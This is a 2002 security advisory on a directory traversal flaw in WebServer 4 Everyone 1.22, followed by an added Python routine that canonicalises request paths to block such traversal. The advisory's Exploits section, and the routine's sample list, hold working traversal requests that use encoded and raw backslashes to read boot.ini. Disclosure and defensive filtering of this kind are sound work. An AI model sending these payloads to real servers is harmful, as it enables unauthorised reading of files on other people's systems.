----------- UkR security team advisory ------------
WebServer 4 Everyone directory traversal bug
-----------------------------------------------------

Name: WebServer 4 Everyone directory traversal bug
Date: 28.08.2002
Author: UkR-XblP/ UkR security team/ http://ust.dp.ua
Application: WebServer 4 Everyone
Version: 1.22
URL: http://www.freeware.lt/
Risk: An attacker can view every file on the remote system

About:
WebServer 4 Everyone is a commercial webserver that runs on Win32 systems.

Bug:
The problem is caused by the character '\' (%5c), which is not checked as a bad character, so the server follows the path given in the URI by the attacker until it reaches the requested file.

Exploits:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini

or

GET /\..\..\..\..\..\boot.ini HTTP/1.0

The second form is a raw HTTP request that can be sent with telnet, because some browsers rewrite the "\.." characters.

Greetz: 2 Nadya Ostafiychuk - happy birthday !!! ;)

---
Professional hosting for everyone - http://www.host.ru
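For comparison, the following is an added example (not code from the advisory or from WebServer 4 Everyone) of the request-path check the server was missing: it percent-decodes until stable, treats '\' exactly like '/', and refuses any path that climbs above the document root instead of silently clamping it. DOCROOT and the sample URIs other than the two from the advisory are constructed for the example.

```python
from typing import Optional
from urllib.parse import unquote

# Hypothetical document root; the affected server is a Win32 host, but the
# check itself is platform independent.
DOCROOT = "C:/www/htdocs"


def canonical_path(raw_uri: str) -> Optional[str]:
    """Map a request-URI to a file path under DOCROOT, or return None if it must be refused.

    The normalisation deliberately treats '\\' like '/', which is the case the
    advisory describes: '%5c' decodes to a backslash that the Win32 file API
    follows as a path separator.
    """
    path = raw_uri.split("?", 1)[0]        # drop the query string
    prev = None
    while prev != path:                    # decode until stable, so %255c is caught too
        prev, path = path, unquote(path)
    if "\x00" in path:                     # a NUL would truncate the path at the OS level
        return None
    path = path.replace("\\", "/")         # backslash is a separator on Win32
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:                  # climbing above the root: refuse, never clamp
                return None
            parts.pop()
            continue
        if ":" in seg:                     # 'C:' drive prefixes and NTFS streams are never valid here
            return None
        parts.append(seg)
    return DOCROOT + "/" + "/".join(parts)


def is_traversal_attempt(raw_uri: str) -> bool:
    """Predicate suitable for scanning request logs or as a front-end filter rule."""
    return canonical_path(raw_uri) is None


if __name__ == "__main__":
    # Constructed sample request lines, including the two URIs from the advisory.
    for uri in ("/index.html",
                "/docs/../index.html",
                "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini",
                "/\\..\\..\\..\\..\\..\\boot.ini",
                "/%255c..%255c..%255cboot.ini"):
        print(f"{uri!r:45} -> {canonical_path(uri)}")
```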